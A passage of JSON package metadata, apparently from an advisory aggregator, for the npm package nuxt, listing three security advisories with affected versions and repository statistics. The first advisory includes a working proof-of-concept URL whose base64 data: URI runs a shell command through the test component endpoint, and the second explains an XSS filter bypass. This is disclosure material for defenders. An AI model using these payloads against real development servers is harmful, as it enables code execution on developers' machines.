sufficient.\n\nhttps://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/test-component-wrapper.ts#L15-L19\n\nSince `import(...)` uses `query.path` instead of the normalized `path`, a non-normalized URL can reach the `import(...)` function.\nFor example, passing something like `./components/test` normalizes `path` to `/root/directory/components/test`, but `import(...)` still receives `./components/test`.\n\nBy using this behavior, it's possible to load arbitrary JavaScript by using the path like the following:\n```\ndata:text/javascript;base64,Y29uc29sZS5sb2coMSk\n```\n\nSince `resolve(...)` resolves the filesystem path, not the URI, the above URI is treated as a relative path, but `import(...)` sees it as an absolute URI, and loads it as a JavaScript.\n\n### PoC\n1. Create a nuxt project and run it in the test mode:\n```\nnpx nuxi@latest init test\ncd test\nTEST=true npm run dev\n```\n2. Open the following URL:\n```\nhttp://localhost:3000/__nuxt_component_test__/?path=data%3Atext%2Fjavascript%3Bbase64%2CKGF3YWl0IGltcG9ydCgnZnMnKSkud3JpdGVGaWxlU3luYygnL3RtcC90ZXN0JywgKGF3YWl0IGltcG9ydCgnY2hpbGRfcHJvY2VzcycpKS5zcGF3blN5bmMoIndob2FtaSIpLnN0ZG91dCwgJ3V0Zi04Jyk\n```\n3. Confirm that the output of `whoami` is written to `/tmp/test`\n\nDemonstration video: https://www.youtube.com/watch?v=FI6mN8WbcE4\n\n### Impact\nUsers who open a malicious web page in the browser while running the test locally are affected by this vulnerability, which results in the remote code execution from the malicious web page.\nSince web pages can send requests to arbitrary addresses, a malicious web page can repeatedly try to exploit this vulnerability, which then triggers the exploit when the test server starts.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2024-08-05T19:49:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/nuxt/nuxt/security/advisories/GHSA-v784-fjjh-f8r4","https://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/test-component-wrapper.ts#L15-L19","https://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/test-component-wrapper.ts#L9-L27","https://nvd.nist.gov/vuln/detail/CVE-2024-34344","https://github.com/advisories/GHSA-v784-fjjh-f8r4"],"source_kind":"github","identifiers":["GHSA-v784-fjjh-f8r4","CVE-2024-34344"],"repository_url":"https://github.com/nuxt/nuxt","blast_radius":44.6190642353937,"created_at":"2024-08-05T20:05:31.212Z","updated_at":"2026-05-12T01:04:39.090Z","epss_percentage":0.01315,"epss_percentile":0.795,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12Nzg0LWZqamgtZjhyNM4AA-Ye","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12Nzg0LWZqamgtZjhyNM4AA-Ye","packages":[{"ecosystem":"npm","package_name":"nuxt","versions":[{"first_patched_version":"3.12.4","vulnerable_version_range":"\u003e= 3.4.0, \u003c 3.12.4"}],"purl":"pkg:npm/nuxt","statistics":{"dependent_packages_count":3031,"dependent_repos_count":70778,"downloads":5922625,"downloads_period":"last-month"},"affected_versions":["3.4.0","3.4.1","3.4.2","3.4.3","3.5.0","3.5.1","3.5.2","3.5.3","3.6.0","3.6.1","3.6.2","3.6.3","3.6.4","3.6.5","3.7.0","3.7.1","3.7.2","3.7.3","3.7.4","3.8.0","3.8.1","3.8.2","3.9.0","3.9.1","3.9.2","3.9.3","3.10.0","3.10.1","3.10.2","3.10.3","3.11.0","3.11.1","3.11.2","3.12.0","3.12.1","3.12.2","3.12.3"],"unaffected_versions":["0.0.1","0.1.0","0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.2.0","0.2.1","0.2.2","0.2.3","0.2.4","0.2.5","0.2.6","0.3.0","0.3.1","0.3.2","0.3.3","0.3.4","0.3.5","0.3.6","0.3.7","0.4.0","0.4.1","0.4.2","0.4.3","0.4.4","0.4.5","0.4.6","0.4.7","0.4.8","0.5.1","0.5.2","0.5.3","0.6.1","0.6.5","0.6.6","0.6.7","0.6.8","0.6.9","0.7.0","0.7.1","0.7.2","0.7.3","0.7.4","0.7.5","0.7.6","0.7.7","0.7.8","0.7.9","0.8.0","0.8.1","0.8.2","0.8.3","0.8.4","0.8.5","0.8.6","0.8.8","0.9.0","0.9.1","0.9.2","0.9.3","0.9.4","0.9.5","0.9.6","0.9.7","0.9.8","0.9.9","0.10.0","0.10.1","0.10.2","0.10.3","0.10.4","0.10.5","0.10.6","0.10.7","1.0.0","1.1.0","1.1.1","1.2.0","1.2.1","1.3.0","1.4.0","1.4.1","1.4.2","1.4.4","1.4.5","2.0.0","2.1.0","2.2.0","2.3.0","2.3.1","2.3.2","2.3.3","2.3.4","2.4.0","2.4.1","2.4.2","2.4.3","2.4.5","2.5.0","2.5.1","2.6.0","2.6.1","2.6.2","2.6.3","2.7.0","2.7.1","2.8.0","2.8.1","2.9.0","2.9.1","2.9.2","2.10.0","2.10.1","2.10.2","2.11.0","2.12.0","2.12.1","2.12.2","2.13.0","2.13.1","2.13.2","2.13.3","2.14.0","2.14.1","2.14.2","2.14.3","2.14.4","2.14.5","2.14.6","2.14.7","2.14.8","2.14.9","2.14.10","2.14.11","2.14.12","2.15.0","2.15.1","2.15.2","2.15.3","2.15.4","2.15.5","2.15.6","2.15.7","2.15.8","2.16.0","2.16.1","2.16.2","2.16.3","2.17.0","2.17.1","2.17.2","2.17.3","2.17.4","2.18.0","2.18.1","3.0.0","3.1.0","3.1.1","3.1.2","3.2.0","3.2.1","3.2.2","3.2.3","3.3.0","3.3.1","3.3.2","3.3.3","3.12.4","3.13.0","3.13.1","3.13.2","3.14.0","3.14.159","3.14.1592","3.15.0","3.15.1","3.15.2","3.15.3","3.15.4","3.16.0","3.16.1","3.16.2","3.17.0","3.17.1","3.17.2","3.17.3","3.17.4","3.17.5","3.17.6","3.17.7","3.18.0","3.18.1","3.19.0","3.19.1","3.19.2","3.19.3","3.20.0","3.20.1","3.20.2","3.21.0","3.21.1","3.21.2","3.21.4","3.21.5","4.0.0","4.0.1","4.0.2","4.0.3","4.1.0","4.1.1","4.1.2","4.1.3","4.2.0","4.2.1","4.2.2","4.3.0","4.3.1","4.4.2","4.4.4","4.4.5"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12Nzg0LWZqamgtZjhyNM4AA-Ye/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12ZjZyLTg3cTQtMnZqZs4AA-Yd","url":"https://github.com/advisories/GHSA-vf6r-87q4-2vjf","title":"nuxt vulnerable to Cross-site Scripting in navigateTo if used after SSR","description":"### Summary\nThe `navigateTo` function attempts to blockthe `javascript:` protocol, but does not correctly use API's provided by `unjs/ufo`. This library also contains parsing discrepancies.\n\n### Details\nThe function first tests to see if the specified [URL has a protocol](https://github.com/nuxt/nuxt/blob/fa9d43753d25fc2e8c3107f194b2bab6d4ebcb9a/packages/nuxt/src/app/composables/router.ts#L142). This uses the [unjs/ufo](https://github.com/unjs/ufo) package for URL parsing. This function works effectively, and returns true for a `javascript:` protocol.\n\nAfter this, the URL is parsed using the [`parseURL`](https://github.com/unjs/ufo/blob/e970686b2acae972136f478732450f6a2f1ab5e5/src/parse.ts#L47) function. This function will refuse to parse poorly formatted URLs. Parsing `javascript:alert(1)` returns null/\"\" for all values. \n\nNext, the protocol of the URL is then checked using the [`isScriptProtocol`](https://github.com/unjs/ufo/blob/e970686b2acae972136f478732450f6a2f1ab5e5/src/utils.ts#L74) function. This function simply checks the input against a list of protocols, and does not perform any parsing. \n\nThe combination of refusing to parse poorly formatted URLs, and not performing additional parsing means that script checks fail as no protocol can be found. Even if a protocol was identified, whitespace is not stripped in the `parseURL` implementation, bypassing the `isScriptProtocol` checks. \n\nCertain special protocols are identified at the top of [`parseURL`](https://github.com/unjs/ufo/blob/e970686b2acae972136f478732450f6a2f1ab5e5/src/parse.ts#L49). Inserting a newline or tab into this sequence will block the special protocol check, and bypass the latter checks. \n\n### PoC\nPOC - https://stackblitz.com/edit/nuxt-xss-navigateto?file=app.vue\n\nAttempt payload X, then attempt payload Y.\n\n### Impact\nXSS, access to cookies, make requests on user's behalf. \n\n### Recommendations\nAs always with these bugs, the `URL` constructor provided by the browser is always the safest method of parsing a URL. \n\nGiven the cross-platform requirements of nuxt/ufo a more appropriate solution is to make parsing consistent between functions, and to adapt parsing to be more consistent with the [WHATWG URL specification](https://url.spec.whatwg.org/).\n\n### Note\nI've reported this vulnerability here as it is unclear if this is a bug in ufo or a misuse of the ufo library.\n\nThis ONLY has impact after SSR has occurred, the `javascript:` protocol within a location header does not trigger XSS.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-08-05T19:49:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N","references":["https://github.com/nuxt/nuxt/security/advisories/GHSA-vf6r-87q4-2vjf","https://nvd.nist.gov/vuln/detail/CVE-2024-34343","https://github.com/advisories/GHSA-vf6r-87q4-2vjf"],"source_kind":"github","identifiers":["GHSA-vf6r-87q4-2vjf","CVE-2024-34343"],"repository_url":"https://github.com/nuxt/nuxt","blast_radius":24.734481260924767,"created_at":"2024-08-05T20:05:31.231Z","updated_at":"2026-05-12T01:04:39.091Z","epss_percentage":0.0017,"epss_percentile":0.38384,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZjZyLTg3cTQtMnZqZs4AA-Yd","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12ZjZyLTg3cTQtMnZqZs4AA-Yd","packages":[{"ecosystem":"npm","package_name":"nuxt","versions":[{"first_patched_version":"3.12.4","vulnerable_version_range":"\u003c 3.12.4"}],"purl":"pkg:npm/nuxt","statistics":{"dependent_packages_count":3031,"dependent_repos_count":70778,"downloads":5922625,"downloads_period":"last-month"},"affected_versions":["0.0.1","0.1.0","0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.2.0","0.2.1","0.2.2","0.2.3","0.2.4","0.2.5","0.2.6","0.3.0","0.3.1","0.3.2","0.3.3","0.3.4","0.3.5","0.3.6","0.3.7","0.4.0","0.4.1","0.4.2","0.4.3","0.4.4","0.4.5","0.4.6","0.4.7","0.4.8","0.5.1","0.5.2","0.5.3","0.6.1","0.6.5","0.6.6","0.6.7","0.6.8","0.6.9","0.7.0","0.7.1","0.7.2","0.7.3","0.7.4","0.7.5","0.7.6","0.7.7","0.7.8","0.7.9","0.8.0","0.8.1","0.8.2","0.8.3","0.8.4","0.8.5","0.8.6","0.8.8","0.9.0","0.9.1","0.9.2","0.9.3","0.9.4","0.9.5","0.9.6","0.9.7","0.9.8","0.9.9","0.10.0","0.10.1","0.10.2","0.10.3","0.10.4","0.10.5","0.10.6","0.10.7","1.0.0","1.0.0-alpha.3","1.0.0-alpha.4","1.0.0-alpha.5","1.0.0-alpha1","1.0.0-alpha2","1.0.0-gh-0b9cd1b","1.0.0-gh-0c3abbb","1.0.0-gh-0d2e2a4","1.0.0-gh-0f4bf0f","1.0.0-gh-1af78f6","1.0.0-gh-1dc0bfc","1.0.0-gh-2d45dc4","1.0.0-gh-2e546b2","1.0.0-gh-3ec8f14","1.0.0-gh-4adfdf3","1.0.0-gh-4cafca0","1.0.0-gh-4cf855c","1.0.0-gh-05a7595","1.0.0-gh-5b923fd","1.0.0-gh-5bacd36","1.0.0-gh-5f57166","1.0.0-gh-6a3e86e","1.0.0-gh-06ae386","1.0.0-gh-6b275e3","1.0.0-gh-6f6a184","1.0.0-gh-6fc5789","1.0.0-gh-8aaae89","1.0.0-gh-8c04f5d","1.0.0-gh-9fc2bac","1.0.0-gh-26ba9f4","1.0.0-gh-29df01f","1.0.0-gh-32e67c7","1.0.0-gh-36ceb1b","1.0.0-gh-36ee372","1.0.0-gh-39ef28c","1.0.0-gh-47dfc5c","1.0.0-gh-49b43c4","1.0.0-gh-65d5fcd","1.0.0-gh-67f0445","1.0.0-gh-72e2351","1.0.0-gh-75dc379","1.0.0-gh-81bb278","1.0.0-gh-83d5f05","1.0.0-gh-88b795a","1.0.0-gh-96c3b4a","1.0.0-gh-99d7177","1.0.0-gh-126b58b","1.0.0-gh-361d1d4","1.0.0-gh-423cee1","1.0.0-gh-447b314","1.0.0-gh-484a8a8","1.0.0-gh-0558ae2","1.0.0-gh-652c3d6","1.0.0-gh-704e7cd","1.0.0-gh-786b25a","1.0.0-gh-868e93e","1.0.0-gh-887ebd5","1.0.0-gh-947f284","1.0.0-gh-4354dee","1.0.0-gh-8868a4e","1.0.0-gh-9163e48","1.0.0-gh-56965b8","1.0.0-gh-60714ec","1.0.0-gh-61231bf","1.0.0-gh-61232a6","1.0.0-gh-806287e","1.0.0-gh-2450747","1.0.0-gh-4968690","1.0.0-gh-a4e2a7c","1.0.0-gh-a5b6d8e","1.0.0-gh-a5e30b7","1.0.0-gh-a29eb99","1.0.0-gh-a74f206","1.0.0-gh-a487b9e","1.0.0-gh-a447249","1.0.0-gh-adb5966","1.0.0-gh-adc7260","1.0.0-gh-ae754af","1.0.0-gh-aeb13eb","1.0.0-gh-afc874a","1.0.0-gh-b5ff5a1","1.0.0-gh-b31b0f2","1.0.0-gh-b83d745","1.0.0-gh-b385ee7","1.0.0-gh-b941b5e","1.0.0-gh-b9268df","1.0.0-gh-b86426a","1.0.0-gh-c55df07","1.0.0-gh-c92d427","1.0.0-gh-cc779b9","1.0.0-gh-cc74126","1.0.0-gh-d4d1bd5","1.0.0-gh-d9e0574","1.0.0-gh-d638ca3","1.0.0-gh-d6014df","1.0.0-gh-e2c0b17","1.0.0-gh-edfc420","1.0.0-gh-eeb79a2","1.0.0-gh-f0cda98","1.0.0-gh-f4bf1dc","1.0.0-rc0","1.0.0-rc1","1.0.0-rc2","1.0.0-rc3","1.0.0-rc4","1.0.0-rc5","1.0.0-rc6","1.0.0-rc7","1.0.0-rc8","1.0.0-rc9","1.0.0-rc10","1.0.0-rc11","1.1.0","1.1.1","1.2.0","1.2.1","1.3.0","1.4.0","1.4.1","1.4.2","1.4.4","1.4.5","2.0.0","2.1.0","2.2.0","2.3.0","2.3.1","2.3.2","2.3.3","2.3.4","2.4.0","2.4.1","2.4.2","2.4.3","2.4.5","2.5.0","2.5.1","2.6.0","2.6.1","2.6.2","2.6.3","2.7.0","2.7.1","2.8.0","2.8.1","2.9.0","2.9.1","2.9.2","2.10.0","2.10.1","2.10.2","2.11.0","2.12.0","2.12.1","2.12.2","2.13.0","2.13.1","2.13.2","2.13.3","2.14.0","2.14.1","2.14.2","2.14.3","2.14.4","2.14.5","2.14.6","2.14.7","2.14.8","2.14.9","2.14.10","2.14.11","2.14.12","2.15.0","2.15.1","2.15.2","2.15.3","2.15.4","2.15.5","2.15.6","2.15.7","2.15.8","2.16.0","2.16.1","2.16.2","2.16.3","2.17.0","2.17.1","2.17.2","2.17.3","2.17.4","2.18.0","2.18.1","3.0.0","3.0.0-rc.0","3.0.0-rc.1","3.0.0-rc.2","3.0.0-rc.3","3.0.0-rc.4","3.0.0-rc.5","3.0.0-rc.6","3.0.0-rc.7","3.0.0-rc.8","3.0.0-rc.9","3.0.0-rc.10","3.0.0-rc.11","3.0.0-rc.12","3.0.0-rc.13","3.0.0-rc.14","3.1.0","3.1.1","3.1.2","3.2.0","3.2.1","3.2.2","3.2.3","3.3.0","3.3.1","3.3.2","3.3.3","3.4.0","3.4.1","3.4.2","3.4.3","3.5.0","3.5.1","3.5.2","3.5.3","3.6.0","3.6.1","3.6.2","3.6.3","3.6.4","3.6.5","3.7.0","3.7.1","3.7.2","3.7.3","3.7.4","3.8.0","3.8.1","3.8.2","3.9.0","3.9.1","3.9.2","3.9.3","3.10.0","3.10.1","3.10.2","3.10.3","3.11.0","3.11.1","3.11.2","3.12.0","3.12.1","3.12.2","3.12.3"],"unaffected_versions":["3.12.4","3.13.0","3.13.1","3.13.2","3.14.0","3.14.159","3.14.1592","3.15.0","3.15.1","3.15.2","3.15.3","3.15.4","3.16.0","3.16.1","3.16.2","3.17.0","3.17.1","3.17.2","3.17.3","3.17.4","3.17.5","3.17.6","3.17.7","3.18.0","3.18.1","3.19.0","3.19.1","3.19.2","3.19.3","3.20.0","3.20.1","3.20.2","3.21.0","3.21.1","3.21.2","3.21.4","3.21.5","4.0.0","4.0.1","4.0.2","4.0.3","4.1.0","4.1.1","4.1.2","4.1.3","4.2.0","4.2.1","4.2.2","4.3.0","4.3.1","4.4.2","4.4.4","4.4.5"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZjZyLTg3cTQtMnZqZs4AA-Yd/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nYzM0LTV2NDMtaDd2OM4AAz0l","url":"https://github.com/advisories/GHSA-gc34-5v43-h7v8","title":"nuxt Code Injection vulnerability","description":"he Nuxt dev server between versions 3.4.0 and 3.4.3 is vulnerable to code injection when it is exposed publicly.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2023-06-13T18:30:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-3224","https://github.com/nuxt/nuxt/commit/65a8f4eb3ef1b249a95fd59e323835a96428baff","https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87","https://github.com/nuxt/nuxt/commits/v3.4.3","https://github.com/nuxt/nuxt/issues/21694","https://github.com/nuxt/nuxt/commit/72ba53efbc2384f802d654fffd92eaf36a81b507","https://github.com/advisories/GHSA-gc34-5v43-h7v8"],"source_kind":"github","identifiers":["GHSA-gc34-5v43-h7v8","CVE-2023-3224"],"repository_url":"https://github.com/nuxt/nuxt","blast_radius":44.6190642353937,"created_at":"2023-06-21T23:03:28.271Z","updated_at":"2026-05-12T01:04:42.758Z","epss_percentage":0.02134,"epss_percentile":0.84178,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nYzM0LTV2NDMtaDd2OM4AAz0l","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nYzM0LTV2NDMtaDd2OM4AAz0l","packages":[{"ecosystem":"npm","package_name":"nuxt","versions":[{"first_patched_version":"3.4.3","vulnerable_version_range":"\u003e= 3.4.0, \u003c 3.4.3"}],"purl":"pkg:npm/nuxt","statistics":{"dependent_packages_count":3031,"dependent_repos_count":70778,"downloads":5922625,"downloads_period":"last-month"},"affected_versions":["3.4.0","3.4.1","3.4.2"],"unaffected_versions":["0.0.1","0.1.0","0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.2.0","0.2.1","0.2.2","0.2.3","0.2.4","0.2.5","0.2.6","0.3.0","0.3.1","0.3.2","0.3.3","0.3.4","0.3.5","0.3.6","0.3.7","0.4.0","0.4.1","0.4.2","0.4.3","0.4.4","0.4.5","0.4.6","0.4.7","0.4.8","0.5.1","0.5.2","0.5.3","0.6.1","0.6.5","0.6.6","0.6.7","0.6.8","0.6.9","0.7.0","0.7.1","0.7.2","0.7.3","0.7.4","0.7.5","0.7.6","0.7.7","0.7.8","0.7.9","0.8.0","0.8.1","0.8.2","0.8.3","0.8.4","0.8.5","0.8.6","0.8.8","0.9.0","0.9.1","0.9.2","0.9.3","0.9.4","0.9.5","0.9.6","0.9.7","0.9.8","0.9.9","0.10.0","0.10.1","0.10.2","0.10.3","0.10.4","0.10.5","0.10.6","0.10.7","1.0.0","1.1.0","1.1.1","1.2.0","1.2.1","1.3.0","1.4.0","1.4.1","1.4.2","1.4.4","1.4.5","2.0.0","2.1.0","2.2.0","2.3.0","2.3.1","2.3.2","2.3.3","2.3.4","2.4.0","2.4.1","2.4.2","2.4.3","2.4.5","2.5.0","2.5.1","2.6.0","2.6.1","2.6.2","2.6.3","2.7.0","2.7.1","2.8.0","2.8.1","2.9.0","2.9.1","2.9.2","2.10.0","2.10.1","2.10.2","2.11.0","2.12.0","2.12.1","2.12.2","2.13.0","2.13.1","2.13.2","2.13.3","2.14.0","2.14.1","2.14.2","2.14.3","2.14.4","2.14.5","2.14.6","2.14.7","2.14.8","2.14.9","2.14.10","2.14.11","2.14.12","2.15.0","2.15.1","2.15.2","2.15.3","2.15.4","2.15.5","2.15.6","2.15.7","2.15.8","2.16.0","2.16.1","2.16.2","2.16.3","2.17.0","2.17.1","2.17.2","2.17.3","2.17.4","2.18.0","2.18.1","3.0.0","3.1.0","3.1.1","3.1.2","3.2.0","3.2.1","3.2.2","3.2.3","3.3.0","3.3.1","3.3.2","3.3.3","3.4.3","3.5.0","3.5.1","3.5.2","3.5.3","3.6.0","3.6.1","3.6.2","3.6.3","3.6.4","3.6.5","3.7.0","3.7.1","3.7.2","3.7.3","3.7.4","3.8.0","3.8.1","3.8.2","3.9.0","3.9.1","3.9.2","3.9.3","3.10.0","3.10.1","3.10.2","3.10.3","3.11.0","3.11.1","3.11.2","3.12.0","3.12.1","3.12.2","3.12.3","3.12.4","3.13.0","3.13.1","3.13.2","3.14.0","3.14.159","3.14.1592","3.15.0","3.15.1","3.15.2","3.15.3","3.15.4","3.16.0","3.16.1","3.16.2","3.17.0","3.17.1","3.17.2","3.17.3","3.17.4","3.17.5","3.17.6","3.17.7","3.18.0","3.18.1","3.19.0","3.19.1","3.19.2","3.19.3","3.20.0","3.20.1","3.20.2","3.21.0","3.21.1","3.21.2","3.21.4","3.21.5","4.0.0","4.0.1","4.0.2","4.0.3","4.1.0","4.1.1","4.1.2","4.1.3","4.2.0","4.2.1","4.2.2","4.3.0","4.3.1","4.4.2","4.4.4","4.4.5"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nYzM0LTV2NDMtaDd2OM4AAz0l/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/nuxt","docker_dependents_count":367,"docker_downloads_count":1396934,"usage_url":"https://repos.ecosyste.ms/usage/npm/nuxt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/nuxt/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-09-07T20:15:38.819Z","issues_count":5600,"pull_requests_count":3061,"avg_time_to_close_issue":9598820.406109164,"avg_time_to_close_pull_request":917616.7577526451,"issues_closed_count":3975,"pull_requests_closed_count":2739,"pull_request_authors_count":426,"issue_authors_count":2527,"avg_comments_per_issue":5.092142857142857,"avg_comments_per_pull_request":2.125449199607971,"merged_pull_requests_count":2441,"bot_issues_count":1,"bot_pull_requests_count":1030,"past_year_issues_count":3007,"past_year_pull_requests_count":2334,"past_year_avg_time_to_close_issue":1435446.9934823092,"past_year_avg_time_to_close_pull_request":302464.36299100803,"past_year_issues_closed_count":2134,"past_year_pull_requests_closed_count":2111,"past_year_pull_request_authors_count":336,"past_year_issue_authors_count":1536,"past_year_avg_comments_per_issue":3.426671100764882,"past_year_avg_comments_per_pull_request":2.1032562125107113,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":817,"past_year_merged_pull_requests_count":1921,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":775,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":220,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":124,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":74,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"userquin","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"warflash","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"wattanx","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"atinux","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":565,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":161,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"pi0","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"BobbieGoede","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"Atinux","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"dargmuesli","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"warflash","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"madebyfabian","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"atinux","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"e